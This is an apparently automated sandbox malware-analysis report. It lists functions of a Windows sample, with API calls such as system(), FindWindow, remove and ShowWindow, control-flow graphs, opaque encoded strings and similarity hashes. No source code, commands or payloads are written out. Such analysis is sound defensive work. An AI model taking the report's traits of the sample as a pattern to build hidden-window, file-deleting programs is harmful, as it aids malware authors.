                                                                                                                  • Opcode Fuzzy Hash: ab273bf31dccc9d7ad5ac621e40352442693ef51d9a40282266747e1f2efc9f3
                                                                                                                  • Instruction Fuzzy Hash: 7A61D763A39A458AEB90BB24D04137DA361EB4CBA4F944B31DA6D037D5DE3CE4918B10
                                                                                                                  Function 00007FF77C91BC80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 107COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Random_device@std@@mallocmemcpy
                                                                                                                  • String ID: 456789$>$?
                                                                                                                  • API String ID: 3242188636-3395382736
                                                                                                                  • Opcode ID: 648c566063535ba3f393b7f13df97951d948215bc3d6760c37ec6b1a71022239
                                                                                                                  • Instruction ID: cbbb6296a54339b3582c1a0e344d914d27bef3c811f79534a301d277252dbce5
                                                                                                                  • Opcode Fuzzy Hash: 648c566063535ba3f393b7f13df97951d948215bc3d6760c37ec6b1a71022239
                                                                                                                  • Instruction Fuzzy Hash: 42510333A38B8186E7549F20E411369B7A5FB9D784F815235EA8D43B96DF7CE1808B00
                                                                                                                  Function 00007FF77C91EAD0 Relevance: 6.1, APIs: 4, Instructions: 92sleepCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Query_perf_counterQuery_perf_frequencySleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2072706261-0
                                                                                                                  • Opcode ID: 2194a2fa61b6804341ac4275b04e4c07c76acd779c48385e2ccf2eb000075af4
                                                                                                                  • Instruction ID: c60b4957155006419ca790499d910cc7a9b75560ab0ee4ba74bb387d576bf8dd
                                                                                                                  • Opcode Fuzzy Hash: 2194a2fa61b6804341ac4275b04e4c07c76acd779c48385e2ccf2eb000075af4
                                                                                                                  • Instruction Fuzzy Hash: FF314D52B3578947DF48EB1AB41B175E255AB8CBD0F885532CA5F0B7D1ED3CE2414B00
                                                                                                                  Function 00007FF77C91F700 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cnd_do_broadcast_at_thread_exit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2632783013-0
                                                                                                                  • Opcode ID: 2869d9d3d2f6179e35a8d8d6f441b2b2e53643ae4e4bf331b521045d6cecb952
                                                                                                                  • Instruction ID: 132cb4c54b2097ebe08fffccee8430a36f8b558183203b38e067914ad10868f5
                                                                                                                  • Opcode Fuzzy Hash: 2869d9d3d2f6179e35a8d8d6f441b2b2e53643ae4e4bf331b521045d6cecb952
                                                                                                                  • Instruction Fuzzy Hash: EDC08C92F3020282EBA437B2A80A1BD4350AF8EB01F986030C99609342CE2DC4EE4B20

                                                                                                                  Non-executed Functions

                                                                                                                  Function 00007FF77C914E70 Relevance: 102.6, APIs: 48, Strings: 8, Instructions: 4633processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: system
                                                                                                                  • String ID: ajsgW$cv{`vH$ib{o_$mrdV$mrdV$sfkpfX$uj|N${ncxn`
                                                                                                                  • API String ID: 3377271179-3190602498
                                                                                                                  • Opcode ID: dc3be9d7b5a9b16d38511b99783f75fc626b8055b38d4ffc4853348646bc3324
                                                                                                                  • Instruction ID: 2b54d0925610b892a9354fa5424a686d3334bec70e3b47c7f191a87424cef977
                                                                                                                  • Opcode Fuzzy Hash: dc3be9d7b5a9b16d38511b99783f75fc626b8055b38d4ffc4853348646bc3324
                                                                                                                  • Instruction Fuzzy Hash: 5A93CB2BE3EB864FF703A73680010A8E3649FBB684791D727FD5475992FB26B1C18644
                                                                                                                  Function 00007FF77C919A10 Relevance: 52.8, APIs: 22, Strings: 7, Instructions: 2070COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindWindow$system
                                                                                                                  • String ID: * 44*"Q$430$W$L]O[?$N[Z[M@$WZfFN8$Z_V[M@$s]^UZ2A
                                                                                                                  • API String ID: 2416310371-2624150015
                                                                                                                  • Opcode ID: 5469edbc63856aa17bbd0d8b092fc140624db01011814871da82e804fa4170f5
                                                                                                                  • Instruction ID: 3fb68b49bd48ac8ad4449636a11dc921a754dca25245279d67b5891db269b483
                                                                                                                  • Opcode Fuzzy Hash: 5469edbc63856aa17bbd0d8b092fc140624db01011814871da82e804fa4170f5
                                                                                                                  • Instruction Fuzzy Hash: 5B03386BE3AB824EF703A63580030A4E2645FBB2C4791E727FD5475993FF2A71D28614
                                                                                                                  Function 00007FF77C9121E0 Relevance: 46.3, APIs: 13, Strings: 13, Instructions: 770processCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1008 7ff77c9121e0-7ff77c912258 1009 7ff77c91225e-7ff77c912265 1008->1009 1010 7ff77c912302-7ff77c912370 system call 7ff77c9201c0 1008->1010 1011 7ff77c912267-7ff77c9122c2 1009->1011 1012 7ff77c9122c4-7ff77c9122c8 1009->1012 1016 7ff77c9123ac-7ff77c912433 call 7ff77c92050c Beep 1010->1016 1017 7ff77c912372-7ff77c91237a 1010->1017 1011->1010 1014 7ff77c9122d0-7ff77c912300 1012->1014 1014->1010 1014->1014 1022 7ff77c912439-7ff77c912449 1016->1022 1023 7ff77c91253b-7ff77c912546 1016->1023 1019 7ff77c912380-7ff77c9123aa call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 1017->1019 1019->1016 1025 7ff77c912450-7ff77c91252f 1022->1025 1026 7ff77c912550-7ff77c91257d 1023->1026 1025->1025 1028 7ff77c912535-7ff77c912539 1025->1028 1026->1026 1029 7ff77c91257f-7ff77c91259a system 1026->1029 1028->1023 1028->1029 1031 7ff77c9125a0-7ff77c9125a7 1029->1031 1032 7ff77c912642-7ff77c912699 system 1029->1032 1033 7ff77c9125a9-7ff77c912604 1031->1033 1034 7ff77c912606-7ff77c91260a 1031->1034 1035 7ff77c91279c-7ff77c9127a8 1032->1035 1036 7ff77c91269f-7ff77c9126ac 1032->1036 1033->1032 1038 7ff77c912610-7ff77c912640 1034->1038 1037 7ff77c9127b0-7ff77c9127dd 1035->1037 1039 7ff77c9126b0-7ff77c912791 1036->1039 1037->1037 1041 7ff77c9127df-7ff77c91284f SetConsoleTitleW call 7ff77c9201c0 1037->1041 1038->1032 1038->1038 1039->1039 1040 7ff77c912797-7ff77c91279a 1039->1040 1040->1035 1040->1041 1044 7ff77c91288c-7ff77c912930 call 7ff77c92050c system GetConsoleWindow ShowWindow 1041->1044 1045 7ff77c912851-7ff77c912859 1041->1045 1051 7ff77c912b82-7ff77c912baa system 1044->1051 1052 7ff77c912936-7ff77c91293d 1044->1052 1046 7ff77c912860-7ff77c91288a call 7ff77c91e8e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff77c91ead0 1045->1046 1046->1044 1055 7ff77c912bb0-7ff77c912bb7 1051->1055 1056 7ff77c912df2-7ff77c912e0d remove 1051->1056 1053 7ff77c912b3f-7ff77c912b48 1052->1053 1054 7ff77c912943-7ff77c912b3d 1052->1054 1058 7ff77c912b50-7ff77c912b80 1053->1058 1054->1051 1059 7ff77c912db9-7ff77c912dbe 1055->1059 1060 7ff77c912bbd-7ff77c912db7 1055->1060 1061 7ff77c912ead-7ff77c912eeb system 1056->1061 1062 7ff77c912e13-7ff77c912e17 1056->1062 1058->1051 1058->1058 1064 7ff77c912dc0-7ff77c912df0 1059->1064 1060->1056 1065 7ff77c912e19-7ff77c912e70 1062->1065 1066 7ff77c912e72-7ff77c912e76 1062->1066 1064->1056 1064->1064 1065->1061 1067 7ff77c912e80-7ff77c912eab 1066->1067 1067->1061 1067->1067
                                                                                                                  APIs
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C912306
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C912395
                                                                                                                  • Beep.KERNEL32 ref: 00007FF77C9123C0
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C912584
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C912646
                                                                                                                  • SetConsoleTitleW.KERNEL32 ref: 00007FF77C9127E4
                                                                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF77C912875
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: _Query_perf_frequency.MSVCP140 ref: 00007FF77C91EB40
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: _Query_perf_counter.MSVCP140 ref: 00007FF77C91EB49
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: Sleep.KERNEL32 ref: 00007FF77C91EBE9
                                                                                                                    • Part of subcall function 00007FF77C91EAD0: Sleep.KERNEL32 ref: 00007FF77C91EC17
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C9128F9
                                                                                                                  • GetConsoleWindow.KERNEL32 ref: 00007FF77C9128FF
                                                                                                                  • ShowWindow.USER32 ref: 00007FF77C91290D
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF77C91E92F
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF77C91E94F
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF77C91E95F
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91E9BE
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91E9EA
                                                                                                                    • Part of subcall function 00007FF77C91E8E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF77C91EA1A
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C912B87
                                                                                                                  • remove.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF77C912DF7
                                                                                                                  • system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF77C912EB1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: D@std@@@std@@U?$char_traits@system$V01@$?sputc@?$basic_streambuf@$??6?$basic_ostream@?good@ios_base@std@@ConsoleSleepV01@@Window$?flush@?$basic_ostream@BeepQuery_perf_counterQuery_perf_frequencyShowTitleV12@remove
                                                                                                                  • String ID: ass$!%1F$2$4$5$6$7$8$9$:$<$XPK@$p
                                                                                                                  • API String ID: 626215716-2315155706
                                                                                                                  • Opcode ID: 3107752629043e942726af6d28afe5fc1e49fe5255247a95fedf609eb7100483
                                                                                                                  • Instruction ID: 2a69b2eea4fc798b839fc089e063d640fb509dd16a9a656bcfa45f7ac5e04c56
                                                                                                                  • Opcode Fuzzy Hash: 3107752629043e942726af6d28afe5fc1e49fe5255247a95fedf609eb7100483
                                                                                                                  • Instruction Fuzzy Hash: A072E627D39BC28AF303A73594020A5E764AFBB2C4B91D733F99431957EF29B1C28614
                                                                                                                  Function 00007FF77C913660 Relevance: 28.8, APIs: 13, Strings: 3, Instructions: 782processCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1139 7ff77c913660-7ff77c9136f1 1140 7ff77c9136f7-7ff77c913707 1139->1140 1141 7ff77c9137ff-7ff77c913809 1139->1141 1142 7ff77c913710-7ff77c9137f3 1140->1142 1143 7ff77c913810-7ff77c91383e 1141->1143 1142->1142 1144 7ff77c9137f9-7ff77c9137fd 1142->1144 1143->1143 1145 7ff77c913840-7ff77c913873 system 1143->1145 1144->1141 1144->1145 1146 7ff77c913979-7ff77c91397d 1145->1146 1147 7ff77c913879-7ff77c913888 1145->1147 1148 7ff77c913980-7ff77c9139b1 1146->1148 1149 7ff77c913890-7ff77c913971 1147->1149 1148->1148 1151 7ff77c9139b3-7ff77c9139ec system 1148->1151 1149->1149 1150 7ff77c913977 1149->1150 1150->1151 1152 7ff77c913aef-7ff77c913af9 1151->1152 1153 7ff77c9139f2-7ff77c9139fe 1151->1153 1155 7ff77c913b00-7ff77c913b2e 1152->1155 1154 7ff77c913a00-7ff77c913ae3 1153->1154 1154->1154 1156 7ff77c913ae9-7ff77c913aed 1154->1156 1155->1155 1157 7ff77c913b30-7ff77c913b61 system 1155->1157 1156->1152 1156->1157 1158 7ff77c913b67-7ff77c913b76 1157->1158 1159 7ff77c913c69-7ff77c913c6d 1157->1159 1160 7ff77c913b80-7ff77c913c61 1158->1160 1161 7ff77c913c70-7ff77c913ca1 1159->1161 1160->1160 1162 7ff77c913c67 1160->1162 1161->1161 1163 7ff77c913ca3-7ff77c913cea system 1161->1163 1162->1163 1164 7ff77c913def-7ff77c913df9 1163->1164 1165 7ff77c913cf0-7ff77c913cfc 1163->1165 1167 7ff77c913e00-7ff77c913e2e 1164->1167 1166 7ff77c913d00-7ff77c913de3 1165->1166 1166->1166 1168 7ff77c913de9-7ff77c913ded 1166->1168 1167->1167 1169 7ff77c913e30-7ff77c913e5f system 1167->1169 1168->1164 1168->1169 1170 7ff77c913f60-7ff77c913f6a 1169->1170 1171 7ff77c913e65-7ff77c913e6e 1169->1171 1173 7ff77c913f70-7ff77c913f9e 1170->1173 1172 7ff77c913e71-7ff77c913f54 1171->1172 1172->1172 1174 7ff77c913f5a-7ff77c913f5e 1172->1174 1173->1173 1175 7ff77c913fa0-7ff77c913ff1 system 1173->1175 1174->1170 1174->1175 1176 7ff77c913ff7-7ff77c914007 1175->1176 1177 7ff77c9140ff-7ff77c914109 1175->1177 1179 7ff77c914010-7ff77c9140f3 1176->1179 1178 7ff77c914110-7ff77c91413e 1177->1178 1178->1178 1180 7ff77c914140-7ff77c914184 system 1178->1180 1179->1179 1181 7ff77c9140f9-7ff77c9140fd 1179->1181 1182 7ff77c91428a-7ff77c914298 1180->1182 1183 7ff77c91418a-7ff77c914196 1180->1183 1181->1177 1181->1180 1185 7ff77c9142a0-7ff77c9142ca 1182->1185 1184 7ff77c9141a0-7ff77c91427f 1183->1184 1184->1184 1186 7ff77c914285-7ff77c914288 1184->1186 1185->1185 1187 7ff77c9142cc-7ff77c914342 system GetConsoleWindow ShowWindow Beep * 4 1185->1187 1186->1182 1186->1187
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: system$Beep$Window$ConsoleShow
                                                                                                                  • String ID: ajsgW$mrdV$sfkpfX
                                                                                                                  • API String ID: 2870283393-3563869954
                                                                                                                  • Opcode ID: c222f044f600f85a32eaf7eee6140250b602af87b35816563f8cc054bfd00be8
                                                                                                                  • Instruction ID: 9f82bdb4a998da5d1b1761658ad846bcf12e28dfd14df9fc1ab4f6934baee31b
                                                                                                                  • Opcode Fuzzy Hash: c222f044f600f85a32eaf7eee6140250b602af87b35816563f8cc054bfd00be8
                                                                                                                  • Instruction Fuzzy Hash: BA62BD2BE3EB864BF703A736D0020E8E3646FBB684791D727FD4471956FB2661C18604
                                                                                                                  Function 00007FF77C914350 Relevance: 16.4, APIs: 7, Strings: 2, Instructions: 675processCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1221 7ff77c914350-7ff77c9143da 1222 7ff77c9144d9-7ff77c9144dd 1221->1222 1223 7ff77c9143e0-7ff77c9143ef 1221->1223 1225 7ff77c9144e0-7ff77c914511 1222->1225 1224 7ff77c9143f0-7ff77c9144d1 1223->1224 1224->1224 1226 7ff77c9144d7 1224->1226 1225->1225 1227 7ff77c914513-7ff77c91454c system 1225->1227 1226->1227 1228 7ff77c91464f-7ff77c914659 1227->1228 1229 7ff77c914552-7ff77c91455f 1227->1229 1231 7ff77c914660-7ff77c91468e 1228->1231 1230 7ff77c914560-7ff77c914643 1229->1230 1230->1230 1232 7ff77c914649-7ff77c91464d 1230->1232 1231->1231 1233 7ff77c914690-7ff77c9146c1 system 1231->1233 1232->1228 1232->1233 1234 7ff77c9146c7-7ff77c9146d6 1233->1234 1235 7ff77c9147c9-7ff77c9147cd 1233->1235 1236 7ff77c9146e0-7ff77c9147c1 1234->1236 1237 7ff77c9147d0-7ff77c914801 1235->1237 1236->1236 1238 7ff77c9147c7 1236->1238 1237->1237 1239 7ff77c914803-7ff77c91484a system 1237->1239 1238->1239 1240 7ff77c91494f-7ff77c914959 1239->1240 1241 7ff77c914850-7ff77c91485c 1239->1241 1243 7ff77c914960-7ff77c91498e 1240->1243 1242 7ff77c914860-7ff77c914943 1241->1242 1242->1242 1244 7ff77c914949-7ff77c91494d 1242->1244 1243->1243 1245 7ff77c914990-7ff77c9149bf system 1243->1245 1244->1240 1244->1245 1246 7ff77c914ac0-7ff77c914aca 1245->1246 1247 7ff77c9149c5-7ff77c9149ce 1245->1247 1249 7ff77c914ad0-7ff77c914afe 1246->1249 1248 7ff77c9149d1-7ff77c914ab4 1247->1248 1248->1248 1251 7ff77c914aba-7ff77c914abe 1248->1251 1249->1249 1250 7ff77c914b00-7ff77c914b51 system 1249->1250 1252 7ff77c914b57-7ff77c914b67 1250->1252 1253 7ff77c914c5f-7ff77c914c69 1250->1253 1251->1246 1251->1250 1254 7ff77c914b70-7ff77c914c53 1252->1254 1255 7ff77c914c70-7ff77c914c9e 1253->1255 1254->1254 1256 7ff77c914c59-7ff77c914c5d 1254->1256 1255->1255 1257 7ff77c914ca0-7ff77c914ce4 system 1255->1257 1256->1253 1256->1257 1258 7ff77c914dea-7ff77c914df8 1257->1258 1259 7ff77c914cea-7ff77c914cf6 1257->1259 1261 7ff77c914e00-7ff77c914e2a 1258->1261 1260 7ff77c914d00-7ff77c914ddf 1259->1260 1260->1260 1262 7ff77c914de5-7ff77c914de8 1260->1262 1261->1261 1263 7ff77c914e2c-7ff77c914e63 system 1261->1263 1262->1258 1262->1263
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: system
                                                                                                                  • String ID: ajsgW$mrdV
                                                                                                                  • API String ID: 3377271179-1078366227
                                                                                                                  • Opcode ID: 10d52e6fea7bf0dfd9ad478f4741d2cfe5731d0e0e468b0231a8431259fda6b5
                                                                                                                  • Instruction ID: a78e625857b2e8d5074274d1285ee3a9b99c841cfe59d88599f540f474ac03e8
                                                                                                                  • Opcode Fuzzy Hash: 10d52e6fea7bf0dfd9ad478f4741d2cfe5731d0e0e468b0231a8431259fda6b5
                                                                                                                  • Instruction Fuzzy Hash: 5C52BB6BE3EB864BF703A736D0020D8E3649FBB684791D727FD5471952FB2661C28604
                                                                                                                  Function 00007FF77C920C5C Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 313767242-0
                                                                                                                  • Opcode ID: 1a5d05e5b76d707d2f4e40ba32f1890c6269f85629ab9340e2c9540fbe4604b8
                                                                                                                  • Instruction ID: 878496a88cc07a9d83dde540a10a4d937341fa55709e7a294094e2ab6d66c6a1
                                                                                                                  • Opcode Fuzzy Hash: 1a5d05e5b76d707d2f4e40ba32f1890c6269f85629ab9340e2c9540fbe4604b8
                                                                                                                  • Instruction Fuzzy Hash: 4E312F77629B81C6EBA09F60E8807EDB364FB88744F454039DA8D57B94DF38D548CB20
                                                                                                                  Function 00007FF77C920E78 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.3719113689.00007FF77C911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF77C910000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.3719048759.00007FF77C910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719224107.00007FF77C923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719312989.00007FF77C927000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.3719399470.00007FF77C928000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff77c910000_18sFhgSyVK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2933794660-0
                                                                                                                  • Opcode ID: 3e7af487194825cac56c75a0491d009657698e662dac04d831ac1c12f72091e9
                                                                                                                  • Instruction ID: e0427cfc2d0bdde9f3d4fddb5d28b62ce4877a1ea03936d88cf3398e0a3b0cb9
                                                                                                                  • Opcode Fuzzy Hash: 3e7af487194825cac56c75a0491d009657698e662dac04d831ac1c12f72091e9
                                                                                                                  • Instruction Fuzzy Hash: AA115E22B64F01CAEB40DF60E8542B8B3A4FB1C758F851E31DAAD467A4DF3CD1688750
